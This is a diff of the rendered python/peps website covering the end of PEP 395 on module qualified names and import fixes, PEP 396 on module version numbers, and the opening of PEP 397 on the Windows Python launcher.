Specifically, whenever __name__ is modified for some other purpose (such +as to denote the main module), then __qualname__ will remain unchanged, +allowing code that needs it to access the original unmodified value.

+

If a module loader does not initialise __qualname__ itself, then the +import system will add it automatically (setting it to the same value as +__name__).

+
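
With the earlier package layout, a hypothetical session under the proposed semantics (not current behaviour) would look like this:

# python -m example.tests.test_foo, then within test_foo.py:
import __main__
print(__main__.__name__)      # "__main__" (modified as usual)
print(__main__.__qualname__)  # "example.tests.test_foo" (unmodified)
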
+

Alternative Names

+

Two alternative names were also considered for the new attribute: “full name” +(__fullname__) and “implementation name” (__implname__).

+

Either of those would actually be valid for the use case in this PEP. +However, as a meta-issue, PEP 3155 is also adding a new attribute (for +functions and classes) that is “like __name__, but different in some cases +where __name__ is missing necessary information” and those terms aren’t +accurate for the PEP 3155 function and class use case.

+

PEP 3155 deliberately omits the module information, so the term “full name” +is simply untrue, and “implementation name” implies that it may specify an +object other than that specified by __name__, and that is never the +case for PEP 3155 (in that PEP, __name__ and __qualname__ always +refer to the same function or class, it’s just that __name__ is +insufficient to accurately identify nested functions and classes).

+

Since it seems needlessly inconsistent to add two new terms for attributes +that only exist because backwards compatibility concerns keep us from +changing the behaviour of __name__ itself, this PEP instead chose to +adopt the PEP 3155 terminology.

+

If the relative inscrutability of “qualified name” and __qualname__ +encourages interested developers to look them up at least once rather than +assuming they know what they mean just from the name and guessing wrong, +that’s not necessarily a bad outcome.

+

Besides, 99% of Python developers should never need to even care that these extra +attributes exist - they’re really an implementation detail to let us fix a +few problematic behaviours exhibited by imports, pickling and introspection, +not something people are going to be dealing with on a regular basis.

+
+
+
+

Eliminating the Traps

+

The following changes are interrelated and make the most sense when +considered together. They collectively either completely eliminate the traps +for the unwary noted above, or else provide straightforward mechanisms for +dealing with them.

+

A rough draft of some of the concepts presented here was first posted on the +python-ideas list ([1]), but they have evolved considerably since first being +discussed in that thread. Further discussion has subsequently taken place on +the import-sig mailing list ([2], [3]).

+
+

Fixing main module imports inside packages

+

To eliminate this trap, it is proposed that an additional filesystem check be +performed when determining a suitable value for sys.path[0]. This check +will look for Python’s explicit package directory markers and use them to find +the appropriate directory to add to sys.path.

+

The current algorithm for setting sys.path[0] in relevant cases is roughly +as follows:

+
# Interactive prompt, -m switch, -c switch
+sys.path.insert(0, '')
+
+
+
# Valid sys.path entry execution (i.e. directory and zip execution)
+sys.path.insert(0, sys.argv[0])
+
+
+
# Direct script execution
+sys.path.insert(0, os.path.dirname(sys.argv[0]))
+
+
+

It is proposed that this initialisation process be modified to take +package details stored on the filesystem into account:

+
# Interactive prompt, -m switch, -c switch
+in_package, path_entry, _ignored = split_path_module(os.getcwd(), '')
+if in_package:
+    sys.path.insert(0, path_entry)
+else:
+    sys.path.insert(0, '')
+
+# Start interactive prompt or run -c command as usual
+#   __main__.__qualname__ is set to "__main__"
+
+# The -m switch uses the same sys.path[0] calculation, but:
+#   modname is the argument to the -m switch
+#   modname is passed to ``runpy._run_module_as_main()`` as usual
+#   __main__.__qualname__ is set to modname
+
+
+
# Valid sys.path entry execution (i.e. directory and zip execution)
+modname = "__main__"
+path_entry, modname = split_path_module(sys.argv[0], modname)
+sys.path.insert(0, path_entry)
+
+# modname (possibly adjusted) is passed to ``runpy._run_module_as_main()``
+# __main__.__qualname__ is set to modname
+
+
+
# Direct script execution
+in_package, path_entry, modname = split_path_module(sys.argv[0])
+sys.path.insert(0, path_entry)
+if in_package:
+    # Pass modname to ``runpy._run_module_as_main()``
+else:
+    # Run script directly
+# __main__.__qualname__ is set to modname
+
+
+

The split_path_module() supporting function used in the above pseudo-code +would have the following semantics:

+
def _splitmodname(fspath):
+    path_entry, fname = os.path.split(fspath)
+    modname = os.path.splitext(fname)[0]
+    return path_entry, modname
+
+def _is_package_dir(fspath):
+    return any(os.path.exists(os.path.join(fspath, "__init__" + info[0]))
+                   for info in imp.get_suffixes())
+
+def split_path_module(fspath, modname=None):
+    """Given a filesystem path and a relative module name, determine an
+       appropriate sys.path entry and a fully qualified module name.
+
+       Returns a 3-tuple of (package_depth, fspath, modname). A reported
+       package depth of 0 indicates that this would be a top level import.
+
+       If no relative module name is given, it is derived from the final
+       component in the supplied path with the extension stripped.
+    """
+    if modname is None:
+        fspath, modname = _splitmodname(fspath)
+    package_depth = 0
+    while _is_package_dir(fspath):
+        package_depth += 1
+        fspath, pkg = _splitmodname(fspath)
+        modname = pkg + '.' + modname
+    return package_depth, fspath, modname
+
+
+

This PEP also proposes that the split_path_module() functionality be +exposed directly to Python users via the runpy module.

+
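
With the earlier project layout on disk, the proposed function would report the package depth, path entry and qualified module name like so (a hypothetical session, assuming the proposed runpy API):

>>> import runpy
>>> runpy.split_path_module("project/example/tests/test_foo.py")
(2, 'project', 'example.tests.test_foo')
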

With this fix in place, and the same simple package layout described earlier, +all of the following commands would invoke the test suite correctly:

+
# working directory: project/example/tests
+./test_foo.py
+python test_foo.py
+python -m example.tests.test_foo
+python -c "from .test_foo import main; main()"
+python -c "from ..tests.test_foo import main; main()"
+python -c "from example.tests.test_foo import main; main()"
+
+# working directory: project/example
+tests/test_foo.py
+python tests/test_foo.py
+python -m example.tests.test_foo
+python -c "from .tests.test_foo import main; main()"
+python -c "from example.tests.test_foo import main; main()"
+
+# working directory: project
+example/tests/test_foo.py
+python example/tests/test_foo.py
+python -m example.tests.test_foo
+python -c "from example.tests.test_foo import main; main()"
+
+# working directory: project/..
+project/example/tests/test_foo.py
+python project/example/tests/test_foo.py
+# The -m and -c approaches still don't work from here, but the failure
+# to find 'example' correctly is pretty easy to explain in this case
+
+
+

With these changes, clicking Python modules in a graphical file browser +should always execute them correctly, even if they live inside a package. +Depending on the details of how it invokes the script, Idle would likely also +be able to run test_foo.py correctly with F5, without needing any Idle +specific fixes.

+
+

Optional addition: command line relative imports

+

With the above changes in place, it would be a fairly minor addition to allow +explicit relative imports as arguments to the -m switch:

+
# working directory: project/example/tests
+python -m .test_foo
+python -m ..tests.test_foo
+
+# working directory: project/example/
+python -m .tests.test_foo
+
+
+

With this addition, system initialisation for the -m switch would change +as follows:

+
# -m switch (permitting explicit relative imports)
+in_package, path_entry, pkg_name = split_path_module(os.getcwd(), '')
+qualname = <<arguments to -m switch>>
+if qualname.startswith('.'):
+    modname = qualname
+    while modname.startswith('.'):
+        modname = modname[1:]
+        pkg_name, sep, _ignored = pkg_name.rpartition('.')
+        if not sep:
+            raise ImportError("Attempted relative import beyond top level package")
+    qualname = pkg_name + '.' + modname
+if in_package:
+    sys.path.insert(0, path_entry)
+else:
+    sys.path.insert(0, '')
+
+# qualname is passed to ``runpy._run_module_as_main()``
+# __main__.__qualname__ is set to qualname
+
+
+
+
+

Compatibility with PEP 382

+

Making this proposal compatible with the PEP 382 namespace packaging PEP is +trivial. The semantics of _is_package_dir() are merely changed to be:

+
def _is_package_dir(fspath):
+    return (fspath.endswith(".pyp") or
+            any(os.path.exists(os.path.join(fspath, "__init__" + info[0]))
+                    for info in imp.get_suffixes()))
+
+
+
+
+

Incompatibility with PEP 402

+

PEP 402 proposes the elimination of explicit markers in the file system for +Python packages. This fundamentally breaks the proposed concept of being able +to take a filesystem path and a Python module name and work out an unambiguous +mapping to the Python module namespace. Instead, the appropriate mapping +would depend on the current values in sys.path, rendering it impossible +to ever fix the problems described above with the calculation of +sys.path[0] when the interpreter is initialised.

+

While some aspects of this PEP could probably be salvaged if PEP 402 were +adopted, the core concept of making import semantics from main and other +modules more consistent would no longer be feasible.

+

This incompatibility is discussed in more detail in the relevant import-sig +threads ([2], [3]).

+
+
+

Potential incompatibilities with scripts stored in packages

+

The proposed change to sys.path[0] initialisation may break some +existing code. Specifically, it will break scripts stored in package +directories that rely on the implicit relative imports from __main__ in +order to run correctly under Python 3.

+

While such scripts could be imported in Python 2 (due to implicit relative +imports) it is already the case that they cannot be imported in Python 3, +as implicit relative imports are no longer permitted when a module is +imported.

+

By disallowing implicit relative imports from the main module as well, +such modules won’t even work as scripts with this PEP. Switching them +over to explicit relative imports will then get them working again as +both executable scripts and as importable modules.

+

To support earlier versions of Python, a script could be written to use +different forms of import based on the Python version:

+
if __name__ == "__main__" and sys.version_info < (3, 3):
+    import peer # Implicit relative import
+else:
+    from . import peer # explicit relative import
+
+
+
+
+
+

Fixing dual imports of the main module

+

Given the above proposal to get __qualname__ consistently set correctly +in the main module, one simple change is proposed to eliminate the problem +of dual imports of the main module: the addition of a sys.meta_path hook +that detects attempts to import __main__ under its real name and returns +the original main module instead:

+
class AliasImporter:
+    def __init__(self, module, alias):
+        self.module = module
+        self.alias = alias
+
+    def __repr__(self):
+        fmt = "{0.__class__.__name__}({0.module.__name__}, {0.alias})"
+        return fmt.format(self)
+
+    def find_module(self, fullname, path=None):
+        if path is None and fullname == self.alias:
+            return self
+        return None
+
+    def load_module(self, fullname):
+        if fullname != self.alias:
+            raise ImportError("{!r} cannot load {!r}".format(self, fullname))
+        return self.module
+
+
+

This sys.meta_path hook would be added automatically during import system +initialisation based on the following logic:

+
main = sys.modules["__main__"]
+if main.__name__ != main.__qualname__:
+    sys.meta_path.append(AliasImporter(main, main.__qualname__))
+
+
+

This is probably the least important proposal in the PEP - it just +closes off the last mechanism that is likely to lead to module duplication +after the configuration of sys.path[0] at interpreter startup is +addressed.

+
+
+

Fixing pickling without breaking introspection

+

To fix this problem, it is proposed to make use of the new module level +__qualname__ attributes to determine the real module location when +__name__ has been modified for any reason.

+

In the main module, __qualname__ will automatically be set to the main +module’s “real” name (as described above) by the interpreter.

+

Pseudo-modules that adjust __name__ to point to the public namespace will +leave __qualname__ untouched, so the implementation location remains readily +accessible for introspection.

+

If __name__ is adjusted at the top of a module, then this will +automatically adjust the __module__ attribute for all functions and +classes subsequently defined in that module.

+

Since multiple submodules may be set to use the same “public” namespace, +functions and classes will be given a new __qualmodule__ attribute +that refers to the __qualname__ of their module.

+

This isn’t strictly necessary for functions (you could find out their +module’s qualified name by looking in their globals dictionary), but it is +needed for classes, since they don’t hold a reference to the globals of +their defining module. Once a new attribute is added to classes, it is +more convenient to keep the API consistent and add a new attribute to +functions as well.

+

These changes mean that adjusting __name__ (and, either directly or +indirectly, the corresponding function and class __module__ attributes) +becomes the officially sanctioned way to implement a namespace as a package, +while exposing the API as if it were still a single module.

+
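
Revisiting the pseudo-module sketch from “Where’s the source?”, the proposed attributes would let both pickling and introspection work (proposed semantics, hypothetical layout):

# mypkg/_impl.py under this proposal
__name__ = "mypkg"  # public location; __qualname__ stays "mypkg._impl"

class Thing:
    pass

# Proposed outcome:
#   Thing.__module__     == "mypkg"        (used by pickle)
#   Thing.__qualmodule__ == "mypkg._impl"  (used by introspection tools)
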

All serialisation code that currently uses __name__ and __module__ +attributes will then avoid exposing implementation details by default.

+

To correctly handle serialisation of items from the main module, the class +and function definition logic will be updated to also use __qualname__ +for the __module__ attribute in the case where __name__ == "__main__".

+

With __name__ and __module__ being officially blessed as being used +for the public names of things, the introspection tools in the standard +library will be updated to use __qualname__ and __qualmodule__ +where appropriate. For example:

+
    +
  • pydoc will report both public and qualified names for modules
  • +
  • inspect.getsource() (and similar tools) will use the qualified names +that point to the implementation of the code
  • +
  • additional pydoc and/or inspect APIs may be provided that report +all modules with a given public __name__.
  • +
+
+
+

Fixing multiprocessing on Windows

+

With __qualname__ now available to tell multiprocessing the real +name of the main module, it will be able to simply include it in the +serialised information passed to the child process, eliminating the +need for the current dubious introspection of the __file__ attribute.

+

For older Python versions, multiprocessing could be improved by applying +the split_path_module() algorithm described above when attempting to +work out how to execute the main module based on its __file__ attribute.

+
+
+
+

Explicit relative imports

+

This PEP proposes that __package__ be unconditionally defined in the +main module as __qualname__.rpartition('.')[0]. Aside from that, it +proposes that the behaviour of explicit relative imports be left alone.

+

In particular, if __package__ is not set in a module when an explicit +relative import occurs, the automatically cached value will continue to be +derived from __name__ rather than __qualname__. This minimises any +backwards incompatibilities with existing code that deliberately manipulates +relative imports by adjusting __name__ rather than setting __package__ +directly.

+
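
Concretely, for the main module from the earlier example this derivation would give (proposed semantics):

__qualname__ = "example.tests.test_foo"  # set by the interpreter
__package__ = __qualname__.rpartition('.')[0]
assert __package__ == "example.tests"
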

This PEP does not propose that __package__ be deprecated. While it is +technically redundant following the introduction of __qualname__, it just +isn’t worth the hassle of deprecating it within the lifetime of Python 3.x.

+
+
+

Reference Implementation

+

None as yet.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0395.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0396/index.html b/pep-0396/index.html new file mode 100644 index 00000000000..44a4c0c3184 --- /dev/null +++ b/pep-0396/index.html @@ -0,0 +1,436 @@ + + + + + + + + PEP 396 – Module Version Numbers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 396 – Module Version Numbers

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
16-Mar-2011
+
Post-History:
+
05-Apr-2011
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+


+

Refer to Accessing version information at runtime and +Single-sourcing the Project Version in the Python +Packaging User Guide for up-to-date recommendations on +accessing package version information at runtime, +and on defining runtime __version__ attributes which are +automatically kept consistent with package distribution metadata.

+

+
+
+

Abstract

+

Given that it is useful and common to specify version numbers for +Python modules, and given that different ways of doing this have grown +organically within the Python community, it is useful to establish +standard conventions for module authors to adhere to and reference. +This informational PEP describes best practices for Python module +authors who want to define the version number of their Python module.

+

Conformance with this PEP is optional, however other Python tools +(such as distutils2 [1]) may be adapted to use the conventions +defined here.

+
+
+

PEP Rejection/Withdrawal

+

This PEP was formally rejected on 2021-04-14. The packaging ecosystem +has changed significantly in the intervening years since this PEP was +first written, and APIs such as importlib.metadata.version() [11] +provide for a much better experience.

+

This rejection was reclassified as a withdrawal on 2024-10-21, +as the previous state was being misinterpreted [12] as suggesting +that no modules should be defining __version__ attributes, +which definitely isn’t the case.

+

Modules are still free to define __version__ if they choose to. +However, choosing not to do so won’t interfere with looking up +the version information for installed distribution packages, so an +Informational PEP isn’t the right tool to document community +conventions around the use of module __version__ attributes +(they’re better covered as part of the Python Packaging User Guide).

+
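
For instance, the runtime lookup that the withdrawal notice points to works without any __version__ attribute being defined (Python 3.8+; the distribution name and output shown are illustrative):

>>> from importlib.metadata import version
>>> version("pip")  # any installed distribution name works here
'24.0'
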
+
+

User Stories

+

Alice is writing a new module, called alice, which she wants to +share with other Python developers. alice is a simple module and +lives in one file, alice.py. Alice wants to specify a version +number so that her users can tell which version they are using. +Because her module lives entirely in one file, she wants to add the +version number to that file.

+

Bob has written a module called bob which he has shared with many +users. bob.py contains a version number for the convenience of +his users. Bob learns about the Cheeseshop [2], and adds some simple +packaging using classic distutils so that he can upload The Bob +Bundle to the Cheeseshop. Because bob.py already specifies a +version number which his users can access programmatically, he wants +the same API to continue to work even though his users now get it from +the Cheeseshop.

+

Carol maintains several namespace packages, each of which is +independently developed and distributed. In order for her users to +properly specify dependencies on the right versions of her packages, +she specifies the version numbers in the namespace package’s +setup.py file. Because Carol only wants to update one version +number per package, she specifies the version number in her module and +has the setup.py extract the module version number when she builds +the sdist archive.

+

David maintains a package in the standard library, and also produces +standalone versions for other versions of Python. The standard +library copy defines the version number in the module, and this same +version number is used for the standalone distributions as well.

+
+
+

Rationale

+

Python modules, both in the standard library and available from third +parties, have long included version numbers. There are established +de facto standards for describing version numbers, and many ad-hoc +ways have grown organically over the years. Often, version numbers +can be retrieved from a module programmatically, by importing the +module and inspecting an attribute. Classic Python distutils +setup() functions [3] describe a version argument where the +release’s version number can be specified. PEP 8 describes the +use of a module attribute called __version__ for recording +“Subversion, CVS, or RCS” version strings using keyword expansion. In +the PEP author’s own email archives, the earliest example of the use +of a __version__ module attribute by independent module +developers dates back to 1995.

+

Another example of version information is the sqlite3 [5] module +with its sqlite_version_info, version, and version_info +attributes. It may not be immediately obvious which attribute +contains a version number for the module, and which contains a version +number for the underlying SQLite3 library.

+

This informational PEP codifies established practice, and recommends +standard ways of describing module version numbers, along with some +use cases for when – and when not – to include them. Its adoption +by module authors is purely voluntary; packaging tools in the standard +library will provide optional support for the standards defined +herein, and other tools in the Python universe may comply as well.

+
+
+

Specification

+
    +
  1. In general, modules in the standard library SHOULD NOT have version +numbers. They implicitly carry the version number of the Python +release they are included in.
  2. +
  3. On a case-by-case basis, standard library modules which are also +released in standalone form for other Python versions MAY include a +module version number when included in the standard library, and +SHOULD include a version number when packaged separately.
  4. +
  5. When a module (or package) includes a version number, the version +SHOULD be available in the __version__ attribute.
  6. +
  7. For modules which live inside a namespace package, the module +SHOULD include the __version__ attribute. The namespace +package itself SHOULD NOT include its own __version__ +attribute.
  8. +
  9. The __version__ attribute’s value SHOULD be a string.
  10. +
  11. Module version numbers SHOULD conform to the normalized version +format specified in PEP 386.
  12. +
  13. Module version numbers SHOULD NOT contain version control system +supplied revision numbers, or any other semantically different +version numbers (e.g. underlying library version number).
  14. +
  15. The version attribute in a classic distutils setup.py +file, or the PEP 345 Version metadata field SHOULD be +derived from the __version__ field, or vice versa.
  16. +
+
+
+

Examples

+

Retrieving the version number from a third party package:

+
>>> import bzrlib
+>>> bzrlib.__version__
+'2.3.0'
+
+
+

Retrieving the version number from a standard library package that is +also distributed as a standalone module:

+
>>> import email
+>>> email.__version__
+'5.1.0'
+
+
+

Version numbers for namespace packages:

+
>>> import flufl.i18n
+>>> import flufl.enum
+>>> import flufl.lock
+
+>>> print flufl.i18n.__version__
+1.0.4
+>>> print flufl.enum.__version__
+3.1
+>>> print flufl.lock.__version__
+2.1
+
+>>> import flufl
+>>> flufl.__version__
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+AttributeError: 'module' object has no attribute '__version__'
+>>>
+
+
+
+
+

Deriving

+

Module version numbers can appear in at least two places, and +sometimes more. For example, in accordance with this PEP, they are +available programmatically on the module’s __version__ attribute. +In a classic distutils setup.py file, the setup() function +takes a version argument, while the distutils2 setup.cfg file +has a version key. The version number must also get into the PEP +345 metadata, preferably when the sdist archive is built. It’s +desirable for module authors to only have to specify the version +number once, and have all the other uses derive from this single +definition.

+

This could be done in any number of ways, a few of which are outlined +below. These are included for illustrative purposes only and are not +intended to be definitive, complete, or all-encompassing. Other +approaches are possible, and some included below may have limitations +that prevent their use in some situations.

+

Let’s say Elle adds this attribute to her module file elle.py:

+
__version__ = '3.1.1'
+
+
+
+

Classic distutils

+

In classic distutils, the simplest way to add the version string to +the setup() function in setup.py is to do something like +this:

+
from elle import __version__
+setup(name='elle', version=__version__)
+
+
+

In the PEP author’s experience however, this can fail in some cases, +such as when the module uses automatic Python 3 conversion via the +2to3 program (because setup.py is executed by Python 3 before +the elle module has been converted).

+

In that case, it’s not much more difficult to write a little code to +parse the __version__ from the file rather than importing it. +Without providing too much detail, it’s likely that modules such as +distutils2 will provide a way to parse version strings from files. +E.g.:

+
from distutils2 import get_version
+setup(name='elle', version=get_version('elle.py'))
+
+
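
Pending such support, a minimal hand-rolled parser along these lines would suffice (an illustrative sketch; the helper name is made up):

import re

def parse_version(path):
    """Extract a __version__ = '...' assignment without importing the file."""
    with open(path) as f:
        for line in f:
            match = re.match(r"""__version__\s*=\s*['"]([^'"]+)['"]""", line)
            if match:
                return match.group(1)
    raise ValueError("no __version__ found in %s" % path)

# setup(name='elle', version=parse_version('elle.py'))
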
+
+
+

Distutils2

+

Because the distutils2 style setup.cfg is declarative, we can’t +run any code to extract the __version__ attribute, either via +import or via parsing.

+

In consultation with the distutils-sig [9], two options are +proposed. Both entail containing the version number in a file, and +declaring that file in the setup.cfg. When the entire contents of +the file contains the version number, the version-file key will be +used:

+
[metadata]
+version-file: version.txt
+
+
+

When the version number is contained within a larger file, e.g. of +Python code, such that the file must be parsed to extract the version, +the key version-from-file will be used:

+
[metadata]
+version-from-file: elle.py
+
+
+

A parsing method similar to that described above will be performed on +the file named after the colon. The exact recipe for doing this will +be discussed in the appropriate distutils2 development forum.

+

An alternative is to only define the version number in setup.cfg +and use the pkgutil module [8] to make it available +programmatically. E.g. in elle.py:

+
from distutils2._backport import pkgutil
+__version__ = pkgutil.get_distribution('elle').metadata['version']
+
+
+
+
+
+

PEP 376 metadata

+

PEP 376 defines a standard for static metadata, but doesn’t +describe the process by which this metadata gets created. It is +highly desirable for the derived version information to be placed into +the PEP 376 .dist-info metadata at build-time rather than +install-time. This way, the metadata will be available for +introspection even when the code is not installed.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0396.rst

+

Last modified: 2024-10-23 14:52:37 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0397/index.html b/pep-0397/index.html new file mode 100644 index 00000000000..5b9c71251ca --- /dev/null +++ b/pep-0397/index.html @@ -0,0 +1,521 @@ + + + + + + + + PEP 397 – Python launcher for Windows | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 397 – Python launcher for Windows

+
+
Author:
+
Mark Hammond <mhammond at skippinet.com.au>, +Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Mar-2011
+
Python-Version:
+
3.3
+
Post-History:
+
21-Jul-2011, 17-May-2011, 15-Mar-2011
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a Python launcher for the Windows platform. A +Python launcher is a single executable which uses a number of +heuristics to locate a Python executable and launch it with a +specified command line.

+
+
+

Rationale

+

Windows provides “file associations” so an executable can be associated +with an extension, allowing for scripts to be executed directly in some +contexts (eg., double-clicking the file in Windows Explorer.) Until now, +a strategy of “last installed Python wins” has been used and while not +ideal, has generally been workable due to the conservative changes in +Python 2.x releases. As Python 3.x scripts are often syntactically +incompatible with Python 2.x scripts, a different strategy must be used +to allow files with a ‘.py’ extension to use a different executable based +on the Python version the script targets. This will be done by borrowing +the existing practices of another operating system - scripts will be able +to nominate the version of Python they need by way of a “shebang” line, as +described below.

+

Unix-like operating systems (referred to simply as “Unix” in this +PEP) allow scripts to be executed as if they were executable images +by examining the script for a “shebang” line which specifies the +actual executable to be used to run the script. This is described in +detail in the execve(2) man page [1] and while user documentation will +be created for this feature, for the purposes of this PEP that man +page describes a valid shebang line.

+

Additionally, these operating systems provide symbolic-links to +Python executables in well-known directories. For example, many +systems will have a link /usr/bin/python which references a +particular version of Python installed under the operating-system. +These symbolic links allow Python to be executed without regard for +where Python is actually installed on the machine (eg., without +requiring the path where Python is actually installed to be +referenced in the shebang line or in the PATH.) PEP 394 ‘The “python” +command on Unix-Like Systems’ describes additional conventions +for more fine-grained specification of a particular Python version.

+

These 2 facilities combined allow for a portable and somewhat +predictable way of both starting Python interactively and for allowing +Python scripts to execute. This PEP describes an implementation of a +launcher which can offer the same benefits for Python on the Windows +platform and therefore allows the launcher to be the executable +associated with ‘.py’ files to support multiple Python versions +concurrently.

+

While this PEP offers the ability to use a shebang line which should +work on both Windows and Unix, this is not the primary motivation for +this PEP - the primary motivation is to allow a specific version to be +specified without inventing new syntax or conventions to describe +it.

+
+
+

Specification

+

This PEP specifies features of the launcher; a prototype +implementation is provided in [3] which will be distributed +together with the Windows installer of Python, but will also be +available separately (but released along with the Python +installer). New features may be added to the launcher as +long as the features prescribed here continue to work.

+
+

Installation

+

The launcher comes in 2 versions - one which is a console program and +one which is a “windows” (ie., GUI) program. These 2 launchers correspond +to the ‘python.exe’ and ‘pythonw.exe’ executables which currently ship +with Python. The console launcher will be named ‘py.exe’ and the Windows +one named ‘pyw.exe’. The “windows” (ie., GUI) version of the launcher +will attempt to locate and launch pythonw.exe even if a virtual shebang +line nominates simply “python” - in fact, the trailing ‘w’ notation is +not supported in the virtual shebang line at all.

+

The launcher is installed into the Windows directory (see +discussion below) if installed by a privileged user. The +stand-alone installer asks for an alternative installation +location, and adds that location to the user’s PATH.

+

The installation in the Windows directory is a 32-bit executable +(see discussion); the standalone installer may also offer to install +64-bit versions of the launcher.

+

The launcher installation is registered in +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs +with a reference counter. +It contains a version resource matching the version number of the +pythonXY.dll with which it is distributed. Independent +installations will overwrite older versions +of the launcher with newer versions. Stand-alone releases use +a release level of 0x10 in FIELD3 of the CPython release on which +they are based.

+

Once installed, the “console” version of the launcher is +associated with .py files and the “windows” version associated with .pyw +files.

+

The launcher is not tied to a specific version of Python - eg., a +launcher distributed with Python 3.3 should be capable of locating and +executing any Python 2.x and Python 3.x version. However, the +launcher binaries have a version resource that is the same as the +version resource in the Python binaries that they are released with.

+
+
+

Python Script Launching

+

The launcher is restricted to launching Python scripts. +It is not intended as a general-purpose script launcher or +shebang processor.

+

The launcher supports the syntax of shebang lines as described +in [1], including all restrictions listed.

+

The launcher supports shebang lines referring to Python +executables with any of the (regex) prefixes “/usr/bin/”, “/usr/local/bin” +and “/usr/bin/env *”, as well as binaries specified without any +directory prefix (i.e. a plain “python” command).

+

For example, a shebang line of ‘#! /usr/bin/python’ should work even +though there is unlikely to be an executable in the relative Windows +directory “\usr\bin”. This means that many scripts can use a single +shebang line and be likely to work on both Unix and Windows without +modification.

+

The launcher will support fully-qualified paths to executables. +While this will make the script inherently non-portable, it is a +feature offered by Unix and would be useful for Windows users in +some cases.

+

The launcher will be capable of supporting implementations other than +CPython, such as jython and IronPython, but given both the absence of +common links on Unix (such as “/usr/bin/jython”) and the inability for the +launcher to automatically locate the installation location of these +implementations on Windows, the launcher will support this via +customization options. Scripts taking advantage of this will not be +portable (as these customization options must be set to reflect the +configuration of the machine on which the launcher is running) but this +ability is nonetheless considered worthwhile.

+

On Unix, the user can control which specific version of Python is used +by adjusting the links in /usr/bin to point to the desired version. As +the launcher on Windows will not use Windows links, customization options +(exposed via both environment variables and INI files) will be used to +override the semantics for determining what version of Python will be +used. For example, while a shebang line of “/usr/bin/python2” will +automatically locate a Python 2.x implementation, an environment variable +can override exactly which Python 2.x implementation will be chosen. +Similarly for “/usr/bin/python” and “/usr/bin/python3”. This is +specified in detail later in this PEP.

+
+
+

Shebang line parsing

+

If the first command-line argument does not start with a dash (‘-‘) +character, an attempt will be made to open that argument as a file +and parsed for a shebang line according to the rules in [1]:

+
#! interpreter [optional-arg]
+
+
+

Once parsed, the command will be categorized according to the following rules:

+
    +
  • If the command starts with the definition of a customized command +followed by a whitespace character (including a newline), the customized +command will be used. See below for a description of customized +commands.
  • +
  • The launcher will define a set of prefixes which are considered Unix +compatible commands to launch Python, namely “/usr/bin/python”, +“/usr/local/bin/python”, “/usr/bin/env python”, and “python”. +A command that starts with one of these strings will be treated as a +‘virtual command’ and the rules described in Python Version Qualifiers +(below) will be used to locate the executable to use.
  • +
  • Otherwise the command is assumed to be directly ready to execute - ie. +a fully-qualified path (or a reference to an executable on the PATH) +optionally followed by arguments. The contents of the string will not +be parsed - it will be passed directly to the Windows CreateProcess +function after appending the name of the script and the launcher +command-line arguments. This means that the rules used by +CreateProcess will be used, including how relative path names and +executable references without extensions are treated. Notably, the +Windows command processor will not be used, so special rules used by the +command processor (such as automatic appending of extensions other than +‘.exe’, support for batch files, etc) will not be used.
  • +
+

The use of ‘virtual’ shebang lines is encouraged as this should +allow for portable shebang lines to be specified which work on +multiple operating systems and different installations of the same +operating system.

+

If the first argument can not be opened as a file or if no valid +shebang line can be found, the launcher will act as if a shebang line of +‘#!python’ was found - ie., a default Python interpreter will be +located and the arguments passed to that. However, if a valid +shebang line is found but the process specified by that line can not +be started, the default interpreter will not be started - the error +to create the specified child process will cause the launcher to display +an appropriate message and terminate with a specific exit code.

+
+
+

Configuration file

+

Two .ini files will be searched by the launcher - py.ini in the +current user’s “application data” directory (i.e. the directory returned +by calling the Windows function SHGetFolderPath with CSIDL_LOCAL_APPDATA, +%USERPROFILE%\AppData\Local on Vista+, +%USERPROFILE%\Local Settings\Application Data on XP) +and py.ini in the same directory as the launcher. The same .ini +files are used for both the ‘console’ version of the launcher (i.e. +py.exe) and for the ‘windows’ version (i.e. pyw.exe)

+

Customization specified in the “application directory” will have +precedence over the one next to the executable, so a user, who may not +have write access to the .ini file next to the launcher, can override +commands in that global .ini file.

+
+
+

Virtual commands in shebang lines

+

Virtual Commands are shebang lines which start with strings which would +be expected to work on Unix platforms - examples include +‘/usr/bin/python’, ‘/usr/bin/env python’ and ‘python’. Optionally, the +virtual command may be suffixed with a version qualifier (see below), +such as ‘/usr/bin/python2’ or ‘/usr/bin/python3.2’. The command executed +is based on the rules described in Python Version Qualifiers +below.

+
+
+

Customized Commands

+

The launcher will support the ability to define “Customized Commands” in a +Windows .ini file (ie, a file which can be parsed by the Windows function +GetPrivateProfileString). A section called ‘[commands]’ can be created +with key names defining the virtual command and the value specifying the +actual command-line to be used for this virtual command.

+

For example, if an INI file has the contents:

+
[commands]
+vpython=c:\bin\vpython.exe -foo
+
+
+

Then a shebang line of ‘#! vpython’ in a script named ‘doit.py’ will +result in the launcher using the command-line +c:\bin\vpython.exe -foo doit.py

+

The precise details about the names, locations and search order of the +.ini files is in the launcher documentation [4]

+
+
+

Python Version Qualifiers

+

Some of the features described allow an optional Python version qualifier +to be used.

+

A version qualifier starts with a major version number and can optionally +be followed by a period (‘.’) and a minor version specifier. If the minor +qualifier is specified, it may optionally be followed by “-32” to indicate +the 32bit implementation of that version be used. Note that no “-64” +qualifier is necessary as this is the default implementation (see below).

+

